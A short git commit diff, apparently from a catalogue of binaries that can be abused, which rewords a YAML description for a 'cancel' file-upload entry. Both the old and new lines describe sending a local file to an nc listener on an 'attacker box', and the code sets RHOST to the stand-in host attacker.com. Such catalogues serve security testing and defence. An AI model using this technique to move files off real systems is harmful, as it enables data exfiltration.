Keep cancel description consistent

master
Emilio Pinna 2018-12-31 09:40:49 +01:00
parent 63147892c4
commit bbfcb5b633
1 changed files with 1 additions and 1 deletions

View File

@ -1,7 +1,7 @@
---
functions:
file-upload:
- description: Send contents of a file to a TCP port. Run `nc -nlvp $RPORT > "file to save"` on the attacker system to capture the contents.
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345